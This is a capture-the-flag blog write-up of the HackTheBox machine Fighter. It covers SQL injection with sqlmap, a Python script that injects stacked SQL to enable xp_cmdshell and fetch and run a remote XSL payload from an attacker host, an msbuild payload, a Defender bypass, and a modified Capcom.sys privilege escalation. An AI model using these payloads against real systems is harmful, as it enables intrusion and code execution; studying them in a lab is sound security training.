· Manuel López Pérez · writeups  · 3 min read

WriteUp - Fighter (HackTheBox)

Write-up of Fighter (HackTheBox): medium-level Windows machine exploiting time-based SQLi to extract credentials, gets RCE via xp_cmdshell + msbuild NPS payload, and escalates to SYSTEM with Capcom.sys (CVE-2019-7253) + bypass of checks.

Write-up of Fighter (HackTheBox): medium-level Windows machine exploiting time-based SQLi to extract credentials, gets RCE via xp_cmdshell + msbuild NPS payload, and escalates to SYSTEM with Capcom.sys (CVE-2019-7253) + bypass of checks.

In this post we will resolve the machine Fighter from HackTheBox. It is a Windows machine quite complicated but very interesting to learn new ways to get shell in windows. This is a machine that I resolved with some members of my htb team and without them this writeup would not have been possible My nick in HackTheBox is: manulqwerty.If you have any proposal or correction do not hesitate to leave a comment.

Write-Up

Enumeration

As always, the first thing will be a scan of all the ports with nmap :

nmap -sC -sV 10.10.10.72

We only have port 80, so let’s take a look at the web. As we read in the important announcement a new website is being developed, but the old one is still working, we also have the domain streetfighterclub.htb we are going to look for the old portal. After several tests we found the subdomain members.streetfighterclub.htb . To make it work we must add to /etc/hosts:

10.10.10.72 members.streetfighterclub.htb

Fuzzing we found: http://members.streetfighterclub.htb/old/login.asp Let’s check if there is sqli. We capture the request with BurpSuite and use the Active Scan: After the Active Scan we detect a time-based SQLi in the logintype parameter. Being a time-based it takes a lot of time in each execution of sqlmap, I put for example how it would be to obtain the databases:

sqlmap -r request.txt --dbms=mssql --technique=B --level 5 --risk 3 -p logintype --dbs --threads=1 --time-sec=1 --batch --flush-session

After a good time getting the data from the database, we realize that there is nothing that can be used to obtain CERs. We will try to get RCE through the SQLi: https://www.tarlogic.com/blog/red-team-tales-0x01/

Exploitation

After hours trying to get rid of this method without I exist, we found the key to bypass the defender : starfighter_xsl from [empire by Luis Vacas](https://github.com/ Hackplayers/Empire-mod-Hackplayers) (which by the way I recommend you use it, you have very interesting additional modules) For this we are going to develop a small python script that makes us run our .xsl and get empire agent :

from requests
import *
params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:"http://10.10.14.7:443/wojo.xsl"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}
resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCQQARTCC":"OJGJBAHDGMPKEHOFHCKLKDIG"})

Let’s migrate the empire to metasploit: https://github.com/trustedsec/nps_payload (example of use) 

 cd C:\\Users\\sqlserv upload /tmp/msbuild_nps.xml msbuild_nps.xml C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe msbuild_nps.xml

Post-Exploitation

Reviewing the files in the C:\Windows directory, I noticed the file capcom.sys and with a simple search I saw that it could be useful to scale to system: At first we see that this exploit does not work for us: After reading the code we see that we must have an x64 session, for this we will use the module windows/local/payload_inject Then we edit the code of the exploit so that it does not make verifications commented on the function check_result Let’s reload and it will work for us:

edit reload

We are already System but this is not over yet, we have a small reversing challenge : Open the files with IDA PRO We see that if the function check () returns 1, it will give us the flag The function check () will execute XOR with 9 each character of the variable aFmFeholH To reverse this I made a small program in C, even though the simplest thing would be patching

 #include <stdio.h>

int main(int argc, char **argv) { char aFmFeholH[15] = "Fm`fEhOl}h"; int v1;

for (v1=0;v1<11;v1++) printf("%c",(*(int *) (aFmFeholH + v1) ^ 9)); puts(""); return 0; } 

OdioLaFeta

Share:
Back to Blog

Related Posts

View All Posts »
WriteUp - Fighter (HackTheBox)

WriteUp - Fighter (HackTheBox)

Write-up de Fighter (HackTheBox): máquina Windows de nivel medio que explota SQLi time-based para extraer credenciales, obtiene RCE vía xp_cmdshell + msbuild NPS payload y escala a SYSTEM con Capcom.sys (CVE-2019-7253) + bypass de checks.

WriteUp - Celestial (HackTheBox)

WriteUp - Celestial (HackTheBox)

Write-up of Celestial (HackTheBox). Low-level Linux machine that exploits an insecure cookie deserialisation in Node.js (CVE-2017-16137) to obtain RCE, then escalates to root by abusing a cron job that executes an editable script.

WriteUp - Celestial (HackTheBox)

WriteUp - Celestial (HackTheBox)

Write-up de Celestial (HackTheBox). Máquina Linux de nivel bajo que explota una deserialización insegura de cookies en Node.js (CVE-2017-16137) para obtener RCE, luego escalada a root abusando de un cron job que ejecuta un script editable.

WriteUp – Rabbit (HackTheBox)

WriteUp – Rabbit (HackTheBox)

Rabbit write-up (HackTheBox): Windows machine that exploits time-based SQLi in Complain Management System for RCE via xp_cmdshell + msbuild NPS payload, and escalates to SYSTEM by abusing WAMP64 running as SYSTEM.